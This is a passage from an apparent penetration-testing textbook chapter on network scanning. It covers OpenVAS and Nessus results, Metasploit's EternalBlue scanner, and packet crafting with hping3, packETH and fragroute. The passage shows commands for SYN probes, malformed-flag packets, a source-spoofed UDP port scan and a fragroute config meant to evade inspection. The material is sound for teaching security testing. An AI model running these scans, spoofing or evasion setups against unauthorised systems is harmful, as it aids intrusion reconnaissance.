OpenVASresultslistYouwillalsogetadditionalusefulinformation.Youwillseethatbeyondthesummaryistheseverity.TheseverityvalueswouldincludeHigh,Medium,andLow.Totheleftoftheseverityisthesolutiontype.Whatyouseeinthesampleshereareallvendorfixes.Youmayalsoseemitigation,whichmeanstherearewaystoalleviatetheimpactifthevulnerabilityweretobeexploited.Youmayalsoseethattherearenofixesavailable.WhileallthatisshowninFigure 5.16areissuesthathavevendorfixes,therearealsoissuesfoundthathavenofixesaswellasissuesthathavemitigations.TotherightoftheseverityissomethingshownasQoD.Thisisthequalityofdetection,andwhatitmeansishowcertainOpenVASisaboutwhetherthevulnerabilityisatruepositive.YouwillseesomeveryhighnumbersinthatcolumnforsomeapparentmacOSvulnerabilities.ConsideringthatthesystemsidentifiedarerunningthelatestmacOSandwerefullypatchedatthetimeofthescan,thesehighconfidencenumbersaremisleading.TounderstandexactlywhatOpenVASwaslookingfortomakethedeterminationwouldrequirelookingattheNASLfileassociatedwiththeidentifiedvulnerability.Inthefar-­rightcolumn,youcanaccessactions,asshowninFigure 5.17.SincethesereportsremainstoredinOpenVASaslongastheinstanceremains,youprobablywanttomakenecessarychangestothefindings.AsinthecaseofthemacOSfindings,Icouldaddanoverride.Asnotedearlier,noteveryfindingisjustasitispresentedbyOpenVAS.Someofthemmaybefalsepositives,forinstance.Youcanchangetheseverityofthefindingtofalsepositivebyusinganoverride.Youcanseethedialogboxthatletsyousetoverrideparameters,includingsettingtheseveritytofalsepositive,inFigure 5.17.VulnerabilityScanning 195FIGURE 5.17 SettinganoverrideOfcourse,afalsepositiveisnottheonlychangetoseveritythatyoucanmake.Youcaneitherincreaseordecreasetheseverity.YoumayknowquiteabitmorethanOpenVASdoes,especiallyifyoueitherworkforthecompanyyouaretestingfororareworkingcloselywiththemratherthanasastrictadversary.Iftherearemitigationsalreadyinplace,youmayfindyouwanttolowertheseverity.TheremayalsobereasonstoincreasetheseverityprovidedbyOpenVAS.Afterall,thisisagenericfinding,sometimesprovidedbythesoftwarevendor.Youcanalsosetotherparametersintheoverride,ifit’snotamatterofseveritythatyouwanttochange.Ifyouweretooverridetheseverity,youprobablywanttoaddanoteaswell,explainingwhatthechangewasandwhyitwasbeingmade.ThisallowsanyotherswhohaveaccesstoOpenVAStoreviewthechangesthatweremadeandknowwhythechangesweremade.Inadditiontomakingchangestoparameterslikeseverity,youcanaddnotestoeachofthefindings.ThatistheothericonundertheActionscolumn.UsingnotesandoverridesallowsyoutouseOpenVASasmoreofavulnerabilitymanagementtool,tosomedegree,ratherthanjustavulnerabilityscanner.Youcanuseitforhistoricalpurposes,toidentifyknownvulnerabilities,ortomakealterationstodifferentparameters.Thisstoredinformationmaybeusefulbecauseanyonetaskedwithprotectingsystemsandnetworkswillbeconstantlyfightingagainstvulnerabilities.Historicalinformation,especiallymitigationsandwhatwasdonetoremediatethevulnerabilities,willbeusefulforsecurityprofessionals.196 Chapter5  ScanningNetworks■NessusNessusistheparentofOpenVAS,whichmakesitworthlookingat,especiallytoseehowithasdivergedfromthepathOpenVAStook.WhileNessusisacommercialproduct,thereisahomelicensesoyoucanuseitonyourhomenetworktocompareagainstOpenVASandalsoseeanotherapproachtovulnerabilityscanning.Whenyoulogin,you’retakentoyourlistofscans,whichwillbeemptyatfirst.Tostartascan,youwouldclicktheNewbutton,whichwilltakeyoutoalistofthedifferentscanpoliciesthatareavailable.YoucanseesomeofthescanpoliciesthatarebuiltintoNessusinFigure 5.18.YouwillseeUpgradeprintedacrosssomeofthescanpolicies.ThismeansthesescanpoliciesareavailableonlyinthecommercialversionandnotavailableintheHomelicense.FIGURE 5.18 ScanpoliciesinNessusIfweselecttheBasicNetworkScanasourstartingpoint,wecanbegintoselectourtargetandthengothroughcustomization.Figure 5.19showstheconfigurationsettingsfortheBasicNetworkScan.You’llseeinthefirstscreenthatyouprovidethenameofthescan.Keepinmindthatyouarecreatingaconfigurationhereandyoucanrunthatconfigurationmultipletimes.Eachrunwillhaveatimestampassociatedwithit,soyoudon’tneedtoaddyourowndateandtimeaspartofthename.You’llwanttonameitsomethingthatismeaningfultoyousoyoucandifferentiatethisconfigurationfromotherconfigurations.VulnerabilityScanning 197FIGURE 5.19 ScanconfigurationsettingsYoumight,forinstance,haveaconfigurationwhereyouhaveaspecificsetofcredentials.Figure 5.20showstheconfigurationforcredentials.You’llseethatyoucancreateSSHandWindowscredentialsforhostauthentication.Foreachofthesetypes,youwillbeabletocreatemultipleconfigurations.YoucoulduseSSHkeyauthenticationforsomesystemsandthenalsohaveanauthenticationsettingforwhereyouneedtousetheusernameandpassword.Accordingtotheinterface,youcanhaveunlimitedcredentialsforbothSSHandWindows.Tocreateanothersetofcredentials,thereisabuttonattheendofthelineindicatingthecredentialtype.Inadditiontohostcredentials,youcansetauthenticationcredentialsfordatabase,miscellaneous,andplaintext.ThelastcategoryisforprotocolslikeHTTP,FTP,andSMTP,amongothers.MiscellaneousgivesyousettingsforVMwareandPaloAltofirewalls.ThisprovidesthemeansforNessustochecklocalvulnerabilitiesacrossavarietyofapplicationsandalsodevices.Inadditiontocredentials,youcanconfigurethepluginsthatyouwanttorun.YoucangettothepluginsbyclickingthePluginstabacrossthetop.LookingbackatFigure 5.19,you’llseeasetoftabsverticallyalongtheleftside.Thisnotonlyprovidesyouwithaccesstothebasicsettingsthatyoucansee,italsoprovidesyouwithaccesstodiscovery,assessment,report,andadvancedconfigurations.TheDiscoverytabletsyoudeterminethetypeof198 Chapter5  ScanningNetworks■discoveryyouwillbedoingonthenetwork,meaningitletsyousetportscanparameters.Bydefault,theportscanwillberunagainstcommonports.Youcanselecttoletitrunagainstallports,whichmaymeanyoucouldfindadditionalvulnerabilitiesoratleastsomeportsyoumaynothaveexpected.FIGURE 5.20 CredentialsconfigurationsettingsTheAssessmenttabletsyousetparametersonwhatNessusshouldscanwithrespecttowebvulnerabilities.Bydefault,Nessuswon’tscanforwebvulnerabilities.Youcansetdifferentlevelsofwebvulnerabilityscanning.ThereisanothersettingundertheAssessmenttabthatisimportant.Bydefault,Nessuswilllimitthenumberoffalsepositivesfound.ItshouldbenotedthatallthesettingsmentionedhereareintheBasicNetworkScanpolicy.Otherscanpolicieswillhavedifferentsettings,someofwhichyouwillbeabletochange.Togetaccesstoallofthesettings,youshouldgothroughtheAdvancedScan,whereallthesettingsareexposedandcanbechanged.TheReporttabletsyouadjustthereportverbosity.Youmaywanttolimitthenumberofdetailsprovided,keepinginformationinthereporttoaminimum.TheNessusreports,bydefault,arefairlycomprehensive.Eachfindingwillcontaindetailsaboutthevulnerabilityaswellasitsseverity,referencesassociatedwiththevulnerability,andpotentialremediations.IncludingenoughdetailsoeverythingwillmakeenoughsensetopeoplewhomaynotbeveryfamiliarwithNessuscantakeupalotofspace.Asthescanisrunning,andcertainlywhenitiscomplete,youwillbeabletoviewtheresults.Initially,youwillgetalistofallthevulnerabilitieswhenyouopenupthescanbyclickingitsnameunderMyScans.YoucanseeapartiallistinFigure 5.21.Alongsidethelistofvulnerabilitiesidentified,youwillseeachartofalltheidentifiedvulnerabilitiestoVulnerabilityScanning 199indicatewhichcategorieshavethemostvulnerabilities.Inthecaseofthescanshown,thevastmajorityareinformationalmessages,whilethesecondhighestnumberofvulnerabilitiesareinthemediumseveritycategory.FIGURE 5.21 ScanresultslistThelistofhostsisorderedbythetotalnumberofissuesidentifiedbyNessus,thoughfindingsarenotallvulnerabilitiessincethereareinformationalitems,whicharenotvulnerabilities.Nessusidentifiedatotalof50hostsonthenetwork,andthehostwiththeIPaddressendingin.52 hadthehighestnumberofvulnerabilitiesbasedonvulnerabilitiesNessusknewaboutatthetimeofthescan.Thisisnottosaytherearenoothervulnerabilities,whichmaynotbeknownbyNessus.It’salsopossiblefortheretobefalsenegatives,meaningNessusdidn’tidentifyaknownvulnerabilityinspiteofthefactthatthevulnerabilityexistedonthescannedhost.Intherightcolumn,youwillseeapercentage.ThispercentageindicateshowcompleteNessusthinksthescanagainstthathostis.Thissnapshotwastakenmidscan.Acrossthetopofthepage,youwillseethreetabs.Thefirstone,andtheonethatispresentedfirst,isthelistofhosts.Thisis,asnotedearlier,orderedbytotalnumberofvulnerabilities.Thesecondtabisthenumberofvulnerabilities.Thisisorderedbytheseverityofthefinding.Thecriticalissuesareontop,followedbythehigh,thenthemedium,andsoon.Ascanofhostsonmynetworkidentifiedtwodifferentcriticalissues.OneofthemwasrelatedtosoftwarefromtheMozillaFoundation.AccordingtoNessus,eitherThunderbirdorFirefoxisinstalledonthetargethost,thoughtheversioninstalledisnolongersupported.ThesecondissuehastodowithamacOSsystem.Theversionoftheoperatingsysteminstalledisonebehindwhatisthemostcurrent.Figure 5.22showsdetailsrelatedtotheMozillavulnerability.200 Chapter5  ScanningNetworks■FIGURE 5.22 FindingdetailsYouwillseeintheoutputadescriptionofthefinding.Youwillalsoseethesolution,whichistoupgradetoasupportedversion.Belowthattherearereferencestoothersitesthatcanprovideadditionaldetailsabouttheissue.Belowthereferencesitesarethedetailsfromthescanplugin.Thisshowstheversionoftheapplicationfoundaswellasthecurrentversionoftheapplicationthatisavailable.Thisshowsthattheversioninstalledisfiveversionsback,andthecurrentversionavailableandsupportedbytheMozillaFoundationis61.0.Whatyoudon’tseeinthisoutputistheIPaddressofthesecondhostwherethisproblemwasidentified.OnlyoneoftheIPaddressesisshownforbrevity.AlsoalongthetopisatablabeledRemediations.Thisprovidesoutputindicatinghowsomeoftheidentifiedvulnerabilitiescanberemediated.YouwillseeinFigure 5.23thatthefourremediationsidentifiedareallrelatedtoupgradingtothelatestversionofsoftware,including,inonecase,updatingtheversionoftheoperatingsysteminuse.VulnerabilityScanning 201FIGURE 5.23 RemediationslistAshasbeennotedseveraltimes,severitieswillvary,andjustbecauseNessusbelievesaseverityshouldbeatacertainleveldoesn’tmeanthatyou,withyourknowledgeoftheenvironmentyouareworkingwith,willagree.YoucancreaterulesinNessussofindingsassociatedwithcertainhostsmaybeautomaticallyrecategorized.ThiscanbedonefromthePluginRulestabalongtheleftnavigationframeinthemainview.Figure 5.24showswhatthedialogboxlookslikeforthePluginRulessettings.Youcanspecifyahost,orjustleavethatfieldblankforallhosts.YouwouldneedtospecifythepluginIDthattheruleappliesto.Withalltheparametersinplacetoidentifywhattheruleappliesto,youjustsettheseverityyouwantassociated,andNessuswilltakecareoftherest.FIGURE 5.24 PluginsRulessettings202 Chapter5  ScanningNetworks■UnlikeOpenVAS,Nessusdoesn’tgiveyouawaytoaddnotestofindings.Onethingyoudoget,though,thatyoudon’tgetinOpenVASisanaudittrail.YoucansearchbypluginIDandbyhostandgetadditionaldetailsaboutthepluginthatwasrun.Asanexample,searchingforthepluginIDfromthecriticalmacOSout-­of-­datefindingshowstheIPaddressesforhostswhereNessuscouldn’tidentifytheOS,hostswhereNessusdididentifytheOSbutitwasn’tmacOS,andalsoIPaddresseswheretheoperatingsystemwascorrectbuttheversionnumberwasn’tcorrect,meaningtherewasnofindingresultingfromtherunoftheplugin.LikeOpenVAS,NessususesNetworkAttackScriptingLanguage(NASL)scripts.TheyarestoredwiththerestoftheNessusinstallation.OnWindows,theinstallationwouldbeintheProgramFilesdirectory.OnLinux,thefilesarestoredin/opt/nessuswiththepluginsin/opt/nessus/lib/plugins.Ifyouwanttoseeexactlywhataplugindoessoyoucanverifythefinding,youshouldcheckthescript.YoucanusethepluginIDtoidentifythefilethatisrunforthatplugin.Thescript,onceyougetusedtoreadingthem,willprovideyouwiththedetailsonhowtoreplicatethevulnerabilitytestsoyoucanverify.Thisverificationisnotonlyimportanttoruleoutfalsepositives,butifitisactuallyavulnerability,youwillneedtohavedocumentationtopresenttothecompanyororganizationyouareworkingwith.Vulnerabilityscanningisjustastageinthetesting.Itisnottheend.Vulnerabilitiesshouldalwaysbeverified.Additionally,ifyouareexpectedtoidentifyasmanyvulnerabilitiesasyoucan,youwillneedtomovetoexploitingthesevulnerabilitiesinhopesofidentifyingmore.WhilethismayrequiretheuseofexploittoolslikeMetasploitoreventoolsthatarecustom-­developed,itcouldbethatyouneedtocreateapacketthatlooksaparticularway.Nomatterwhatthefindingsare,though,theyneedtobeverifiedbeforebeingpresentedasfindings.Lookingfor Vulnerabilitieswith MetasploitMetasploitisaversatiletool.Certainly,youcanuseitforexploitingapplicationsaswellastheportscanningwedidearlier.Asit’saframeworkandtherearealotofmodules,itshouldn’tcomeasabigsurprisethattherearealotofvulnerabilityscanners.OneexampleisascannermodulefortheEternalBluevulnerability.ThisisavulnerabilityintheimplementationoftheServerMessageBlock(SMB)protocolthatwasdiscoveredbytheNationalSecurityAgency(NSA),whichdevelopedanexploitforit,whichwasreleasedwithouttheNSA’sapprovalbyagroupcalledtheShadowBrokers.ThefollowingisoneofthevulnerabilityscannersthatlooksforsystemsvulnerabletotheEternalBlueexploit.Whilethefixforthisvulnerabilityhasbeenoutforyearsatthispoint,therearestillmanysystemsinproductionthatarevulnerabletoit.msf6auxiliary(scanner/portscan/syn)>useauxiliary/scanner/smb/smb_ms17_010msf6auxiliary(scanner/smb/smb_ms17_010)>setRHOSTS192.168.4.0/24RHOSTS=>192.168.4.0/24msf6auxiliary(scanner/smb/smb_ms17_010)>run[-­]192.168.4.10:445[-­]192.168.4.15:445[*]192.168.4.0/24:445-­HostdoesNOTappearvulnerable.-­HostdoesNOTappearvulnerable.-­Scanned26of256hosts(10%complete)PacketCraftingand Manipulation 203TherearealargenumberofscannersavailableinMetasploit.Notallthescannersaredirectlyrelatedtothevulnerabilities.SearchingforthewordscannerinMetasploitreturned590results,withsomeoftheoutputfollowing.Injusttheoutputfragmenthere,youcanseethatsomeofthemarerelatedtoknownvulnerabilitieswhilesomearelookingforinstancesofapplications,whichmayhaveaparticularconfigurationissue.192auxiliary/scanner/http/manageengine_deviceexpert_user_creds2014-­08-­28normalNoManageEngineDeviceExpertUserCredentials193auxiliary/scanner/http/manageengine_securitymanager_traversal2012-­10-­19normalNoManageEngineSecurityManagerPlus5.5DirectoryTraversal194auxiliary/scanner/http/mediawiki_svg_fileaccessnormalNoMediaWikiSVGXMLEntityExpansionRemoteFileAccess195auxiliary/scanner/http/meteocontrol_weblog_extractadminnormalNoMeteocontrolWEBlogPasswordExtractor196auxiliary/scanner/http/mod_negotiation_brutenormalNoApacheHTTPDmod_negotiationFilenameBruter197auxiliary/scanner/http/mod_negotiation_scannernormalNoApacheHTTPDmod_negotiationScanner198auxiliary/scanner/http/ms09_020_webdav_unicode_bypassnormalNoMS09-­020IIS6WebDAVUnicodeAuthenticationBypass199auxiliary/scanner/http/ms15_034_http_sys_memory_dumpnormalYesMS15-­034HTTPProtocolStackRequestHandlingHTTP.SYSMemoryInformationDisclosureIt’snotthemostcomprehensivevulnerabilityscanner,butifyouarealreadyinMetasploitforotherpurposes,youcanmakeuseofvulnerabilityscanmodulestolookinatargetedwayforsomevulnerabilities.IfyouhaveagoodwaytodetectavulnerabilityandfeellikewritingalittleRuby,youcanwriteamoduleforMetasploitthatcanlookforthatvulnerability.PacketCraftingand ManipulationWhenyouaresendingdataoutoverthenetwork,thereisaclearpathitfollowsbeforeexitingthenetworkinterfaceonyoursystem.We’vegoneoverthis,toadegree,bytalkingabouttheOpenSystemsInterconnection(OSI)model.Let’ssaythatyouarevisitingawebpage.YouenteraURLintotheaddressbar.YourbrowsertakestheinputandcreatestheHTTPrequestheadersthatareneededtosendtotheserver.Forsimplicity,we’llskiptheencryptionpiecesandjusttalkabouthowthecompletepacketisputtogether.Theapplicationmakesarequestoftheoperatingsystemtoopenaconnectiontotheserver.Thistriggerstheoperatingsystemtobuildapacketusinginformationprovidedbytheapplication.ThisincludesthehostnameorIPaddressaswellastheportnumber.Unlessotherwiseprovided,theportnumberwilldefaulttoeither80or443,dependingonwhetherthecommunicationisHTTPSorHTTP.ThisinformationwillallowtheoperatingsystemtocreatethenecessaryheadersforbothTCPandIP,layers4and3.204 Chapter5  ScanningNetworks■Allofthisistosaythattheapplicationinitiatesrequestsbasedoninteractionfromtheuser.Itfollowsaclearpath,andtheinformationplacedintothenecessaryheadersforeachprotocoliscoherentandeasilytracedbacktotheoriginalsourceoftheinformation.Sometimes,though,youmayneedtosenddatathatdoesn’tfollowacoherentpath.Itcouldbethatyouneedtomanipulateheaderswithdatathatwouldn’tnormallybefoundintheheaderfields.Eachheaderfieldisaknownsizeandisbinary,whichmeansyouaren’tgoingtobesendingacharacterinsteadofanumber,forinstance.Nothinginthenetworkheaders,lookingatlayers4andbelowforsure,isdatathatwouldgothroughanASCIIdecodetobeconvertedtocharacterdata.Thereareanumberoftoolsthatcanbeusedtocraftorotherwisemanipulatetheheaderdata.Someofthesearedesignedforthesolepurposeofcreatingpacketsthatwouldlookthewayyouwantthemtolook.ThismaybeatoollikepackETH,whichusesaGUItoletyousetthefields.Othershaveotherpurposesthatallowyoutointeractwiththetargetsysteminawaythatyoumaynototherwisebeabletodowithoutwritingyourownprogram.Atoollikehpingwillletyoubuildapacketbasedonthecommand-­lineparameters.Usingatoollikehping,youcouldassesstheresponsefromthesystem.Finally,youmaywanttomanglethepacketusingasetofrules,whichwouldputtheoperatingsystem’snetworkstacktothetest,toseeifitcanhandlepoorlyconstructedpackets.hpingTheprogramhpingisconsideredbythedevelopertobetheSwissArmyknifeofTCP/IPpackets.Youcoulduseitasastraightforwardpingprogram,sendingICMPechorequests.Sincehpingisprimarilyapacketcraftingprogram,allowingyoutoinitiateconnectionsusingdifferentprotocolswiththeheadersettingsyouwant,thedefaultmodemaynotworkverywellforyou.Bydefault,ifyoudon’tspecifyanythingotherthanthetargethostorIPaddress,hpingwillsendmessagestoport0onyourtargetwithavaryingsourceaddress.Address0isessentiallyaninvaliddestinationsinceitisconsideredreservedandhasnopurpose.Youshouldn’tgetanyresponsefromthesystemyouaresendingtrafficto.Ifyoudo,thetargethostisreallyviolatingtheprotocol.WhilehpingusesTCPforthis,port0isinvalidforbothUDPandTCP.Whileyoucanusehpingasareplacementforthepingprogram,bycallingitwiththe-­1parameter,meaningyouareusingICMPmode,youcanalsocreateconnectionstospecificports.Youwillgetthesamebehavioryouwouldgetwiththepingprogram,meaningyouwillbegettingthe“aliveness”ofthesystemandtheround-­triptime.Youwillgetsomethingevenmoredetailed,though,sinceyouwillknowwhetheraparticularserviceisupandrunning.Thismaybeusefulifyouaredoingtestingagainstanapplication.Youmaywanttoknowwhentheservicefails.Youwillgetalotofdetailfromtheresponse,inadditiontotheround-­triptime.Youcanseeinthefollowingcodelistingarunofhping3againstawebserveronatargetsystem.PacketCraftingand Manipulation 205SendingSYNMessagesto aTargetSystem[email protected]:~#hping3-­S-­p80192.168.86.1HPING192.168.86.1(eth0192.168.86.1):Sset,byteslen=46ip=192.168.86.1ttl=64DFid=0sport=80win=29200rtt=7.9mslen=46ip=192.168.86.1ttl=64DFid=0sport=80win=29200rtt=7.9mslen=46ip=192.168.86.1ttl=64DFid=0sport=80win=29200rtt=7.6mslen=46ip=192.168.86.1ttl=64DFid=0sport=80win=29200rtt=7.5mslen=46ip=192.168.86.1ttl=64DFid=0sport=80win=29200rtt=7.3mslen=46ip=192.168.86.1ttl=64DFid=0sport=80win=29200rtt=3.0mslen=46ip=192.168.86.1ttl=64DFid=0sport=80win=29200rtt=2.8mslen=46ip=192.168.86.1ttl=64DFid=0sport=80win=29200rtt=2.7mslen=46ip=192.168.86.1ttl=64DFid=0sport=80win=29200rtt=2.5mslen=46ip=192.168.86.1ttl=64DFid=0sport=80win=29200rtt=2.4mslen=46ip=192.168.86.1ttl=64DFid=0sport=80win=29200rtt=2.2ms40headers+0dataflags=SAseq=0flags=SAseq=1flags=SAseq=2flags=SAseq=3flags=SAseq=4flags=SAseq=5flags=SAseq=6flags=SAseq=7flags=SAseq=8flags=SAseq=9flags=SAseq=10hpingwillprovideyouwithalloftheflagsthataresetintheresponse.ThisincludestheSYNandACKflagsaswellasthedon’tfragmentbit,indicatedbytheDFintheresponse.Youcanseealotofotherdetailsaswell,includingtheIPidentificationnumber,therelativesequencenumber,andthewindowsizeasprovidedbythetargethost.Inthecaseofaportwherethereisnolistener,youwon’tgetamessageindicatingthatthehostisunreachableorthatthemessagetimedout,asyouwouldwithastandardpingprogram.Instead,youwillgetthesameresponsethatyougotfromanopenport.InsteadofshowingSAforflags,meaningthattheSYNandACKflagswereset,youwillseeRA,meaningtheRSTandACKflags.Theremotesystemresettheport,tellingusthatthereisnoapplicationthere.Youwillstillget alloftheotherinformation,includingtheround-­triptime,whichwilltellyouhowquickthetargetsystemistorespondtothesemessages,whichwillbeafactorofnetworkandoperatingsystemresponsiveness.206 Chapter5  ScanningNetworks■Rawsocketsprovideprogrammerswiththeabilitytobypassthenetworkstack.Whenaprogrammerusesrawsockets,theprogramisexpectedtohandleallthethingsthenetworkstackdoes,meaningallthevaluesintheheadersshouldbeset.Rawsocketsprovidetheprogrammerwithcompletecontroloverwhatthepacketwillenduplookinglike.Noneofithastobeconsideredlegalfromthestandpointoftheprotocols,ifyouaren’texpectingresponses.Thisisnottosaythatyouwillalwaysgetaresponse,though.Youcouldcompletelymanglethemessagetothetargethost.Asoneexample,takealookatthecommandlinebelow.TheoffsetfortheTCPheadersisbeingsetincorrectly,whichmeansthetargetnetworkstackisbeingpointedtothewrongplace.Also,theSYNandFINflagsarebothset,aswellastheACKandPSHflags.Thisisaflagcombinationthatmakesnosense.Thesourceportisbeingsetto15,whichwouldrequireadministrativeprivilegestodo,asdomostthingsinhping,consideringitisgenerallyusingsomethingcalledrawsockets.hpingwith BadFlagsSet[email protected]:~#hping3-­O8-­s15-­F-­S-­P-­A-­t3-­p80192.168.86.1HPING192.168.86.1(eth0192.168.86.1):SAFPset,40headers+0databytes^C-­-­­192.168.86.1hpingstatistic-­-­-­19packetstransmitted,0packetsreceived,100%packetlossround-­tripmin/avg/max=0.0/0.0/0.0msInadditiontoICMPandTCP,youcansendUDPmessages.TherearefewerparametersusedtosendUDPmessagesbecauseofthelimitednumberofoptionsavailableintheUDPheaders.Wecan,though,usehpingtoperformaportscan.WecanscanarangeofUDPportsbyusingthe-­-­scan(or-­8)parameter.Youcanseethisdoneinthefollowingcode.Using-­-­scan,weneedtospecifytheportsbeingtargeted.Thisscantargetstheadministrativeports1–1023.Therearenoportslisteningonthishostinthatrange.Whatwastruncatedfromtheoutputwasalloftheportnumbersandassociatedservicenamesthatwerefoundnottobelistening.Oneotherfeatureofhpingistheabilitytospoofaddresses.Usingthe-­aparameter,followedbyanIPaddress,willhavehpingchangethesourceaddressinmessagesgoingout.Thiswillmeanthatyouwon’tgetanyresponses,becauseresponseswillbesenttothesourceaddressyouspecify.UDPPortScanwith hping[email protected]:~#hping3-­-­scan1-­1023–a10.15.24.5-­2192.168.86.1Scanning192.168.86.1(192.168.86.1),port1-­10241024portstoscan,use-­Vtoseeallthereplies+-­-­-­-­+-­-­-­-­-­-­-­-­-­-­-­+-­-­-­-­-­-­-­-­-­+-­-­-­+-­-­-­-­-­+-­-­-­-­-­+-­-­-­-­-­+|port|servname|flags|ttl|id|win|len|+-­-­-­-­+-­-­-­-­-­-­-­-­-­-­-­+-­-­-­-­-­-­-­-­-­+-­-­-­+-­-­-­-­-­+-­-­-­-­-­+-­-­-­-­-­+PacketCraftingand Manipulation 207Allrepliesreceived.Done.Notrespondingports:(1tcpmux)(2nbp)(3)(4echo)(5)(6zip)(7echo)(8)(9discard)(10)(11systat)(12)(13daytime)(14)(15netstat)(16)(17qotd)(18msp)(19chargen)(20ftp-­data)(21ftp)(22ssh)(23telnet)(24)Oneotherfeatureworthmentioningistheabilitytosendpacketsofanysizeyouwant.Tochangethesizeofthedatabeingsent,youwoulduse-­dfollowedbyabytecount.Thissetsthebodysizeofthepacketintheheaders.Youcanalsofillthepacketsbyspecifyingafilenameusingthe-­-­fileparameter.Thiswillreadthecontentsofthefileandusethemtofillthedataportionofthepacket.Youmaybeabletocrashtheapplicationbecausethedatabeingsentcouldviolateprotocolspecifications.packETHWherehpingusescommand-­lineparameters,packETHtakesaGUIapproachtobeingabletoset alltheparameters.Thesetsofheadersvary,dependingontheprotocolsselected,andeachofthelower-­layerheadersindicatethenextprotocol,meaningthenextsetofheaders.Whenyouselectwhichprotocolsyouareusing,packETHwilladjusttoprovidealloftheheaderfieldsfortheprotocolyouhaveselected.Figure 5.25showstheIPheaderfieldsaswellastheTCPheaderfields.YouwillalsoseewhereIPisselectedasthenextprotocolinthelayer2header.Youcan’tseethelayer2headerinthisscreencapture,butyouwouldbeabletosetaddresses,determinewhatversionofthelayer2protocolyouareusing,andalsoaddin802.1qfields,whichprovidesatagfieldtoindicatewhichvirtualLAN(VLAN)theframeshouldbeon.FIGURE 5.25 packETHinterface208 Chapter5  ScanningNetworks■Inadditiontosettingheaders,youcanaddyourowndatathatwouldgointothepayload.Youdon’tneedtohavedatatoinclude,though,ifyouwouldprefertojusthavedatafilledintoacertainsize.Figure 5.26showstheTCPheadersfilledinwiththedatapayloadalsofilledin.Ontherightsideofthescreencapture,youcanseetwoeditboxes.Oneofthemisthedatapattern,whichisexpectedtobeinhexadecimal.Theotheroneisthenumberofinstancesofthepatternprovided.Thefirstfieldissettoab,andthenumberofiterationsissetto500.Onceyouhavethepatternandnumber,youapplythepatternandyourdatapayloadwillbefilledin.You’llnoticethatitisformattedjustasyou’dexpectahexadecimaldumptobeformatted,witheachhexadecimalbyteseparatedfromtheothers.FIGURE 5.26 DatapatternfillWhileyoucancreatepacketsfollowingknownandunderstoodfields,youcanalsocreateyourownpackets.Yourlayer2headershavetobesetwithMACaddressesinthesourceanddestinationsothereissomewherefortheframetogo,butbeyondthat,youcandowhateveryoulikebyselectingUserDefinedPayload.Thiswouldleaveoutalllayer3 informationandonlyincludewhatyouwantedtoinclude,whetherit’stextorahexadecimalfillpattern.Figure 5.27showsapayloadcreatedusingapattern.Usingtextcausedanerrorwiththenext-­layerprotocolspecifiedbecauseit’snotsetuptotakerawtext.Youneedtocreateahexadecimalpatterninstead.You’llseeatthebottomofthescreencapturethat60bytesweresent,whichincludesthenetworklayerpayloadwespecified.Onceyouhaveyourpacketbuilt,youcansendit.ClickingtheSendbuttoninthetoolbarwillsendasinglepacket.Ifyouwanttosendmorethanasinglepacket,youwillhavetouseeithertheGen-­borGen-­sbutton.Gen-­bgivesyoutheabilitytospecifythenumberofpacketstosend.You’llbeabletoindicatethebandwidthyouwanttouse,oryoucouldalsoindicatetheinter-­packetgap,whichisthedelaybetweenpacketsbeingsent.Gen-­sgivesyoutheabilitytogeneratestreams.AstreamcanbeadefinedpatternofpacketsthathavebeenPacketCraftingand Manipulation 209savedtodifferentfiles.Onceyouhavethepatterndefinedbyindicatingthepacketsyouwanttouse,youcantellpackETHhowyouwanttosendthem—­burst,continuous,orrandom.Youcanalsoindicatethetotalnumberofpacketsyouwanttosendaswellasthedelay.Speakingofloadingpacketsfromafile,youcansavethepacketsyoucreate.ThisallowsyoutocreateanumberofpacketsandloadthemintoGen-­smode,butitalsoallowsyoutocreateapacketandloadituptosenditanytimeyouwantwithouthavingtore-­createthepacket.Ifyouwanttouseanexistingpacketyouhavecapturedasyourstartingpoint,youcanalsoloadapacketcapture(PCAP)file.WhenyouselectaframefromthelistinthePCAPview,thatframewillshowupintheBuilderview.FIGURE 5.27 Networklayerdatafillfragroutefragrouteisaprogramusedtomanglepacketsbeforetheyaresenttoatargetyouspecify.Itworksbymakingadjustmentstotheroutingtablesoallmessagesgoingtothetargetaresentthroughthefragrouteapplicationfirst.Tomakefragroutework,youneedtocreateaconfigurationfile.Thisconfigurationfilehasdirectivestellingfragroutehowtohandle210 Chapter5  ScanningNetworks■packetsthatpassthroughtheapplication.Inthefollowingcodelisting,youcanseeaconfigurationfilewithahandfulofdirectivesthatareguaranteedtocreatereallymessed-­upnetworktraffic.fragrouteConfigurationFile[email protected]$catfrag.confdelayrandom1duplast30%ip_chaffdupip_frag128newtcp_chaffnull16orderrandomprintThedirectivesheretellfragroutetodoanumberofthingstopackets.Thefirstthingistodelayrandompacketsby1 millisecond.Next,thereisa30percentchanceofduplicatingthelastpacket.Theip_chafflineaddsduplicatepacketsintothequeue.Whenmessagesaresentout,theyhaveamaximumtransmissionunit(MTU)sizethatisdictatedbythedatalinkprotocol.WithEthernet,thatis1,500bytes,thoughit’spossibletogetsomethingcalledjumboframesthataremuchlarger.Morecommonly,youwillseeanMTUof1,500.AnymessagethatislargerthantheMTUgetsfragmented.Usingfragroute,though,wearegoingtoforcethepacketstogetfragmentedbeforesending.Thathappensintheip_frag128 newline.Wewillbefragmentingat128bytes,whichisenoughforheaderdataandalittlebitmore.Anythinglargebeingsent,suchasanimagefile,willhavealargenumberoffragments.Thelinestartingwithtcp_chaffdoesthesamethingthatip_chaffdoes,workinginsteadontheTransportlayer.TheTCPsegmentsbeinginsertedwillhavenullTCPflags,asspecifiedintheconfiguration.Wecouldalsohavehadinvalidchecksums,oldertimestamps,orotherbogusinformationintheTCPheader.Thiswouldhavecausedthesemessagestoberejectedonthefarendoftheconversation,afterinspection.Finally,theorderofthemessageswillberandomized,sotheywillbeoutoforderandneedreassemblyonthefarend,andthenmessagedetailswillbeprinted.Usingasimplerconfigurationfile,youcanseearunoffragrouteinthefollowingcodelisting.ThisistheconfigurationfilethatwasinstalledbydefaultwiththefragroutepackageonaKaliLinuxsystem.Thisconfigurationfileusestcp_segtobreakupTCPdataintospecifiedsegmentsizes.Afterthat,itusesip_fragandip_chaffasmentionedearlier.Then,itwillsetanorderandprintthemessagedetails,whichyoucansee.fragrouteRunagainstTarget[email protected]:~#fragroute-­f/etc/fragroute.conf184.159.210.190fragroute:tcp_seg-­>ip_frag-­>ip_chaff-­>order-­>printEvasionTechniques 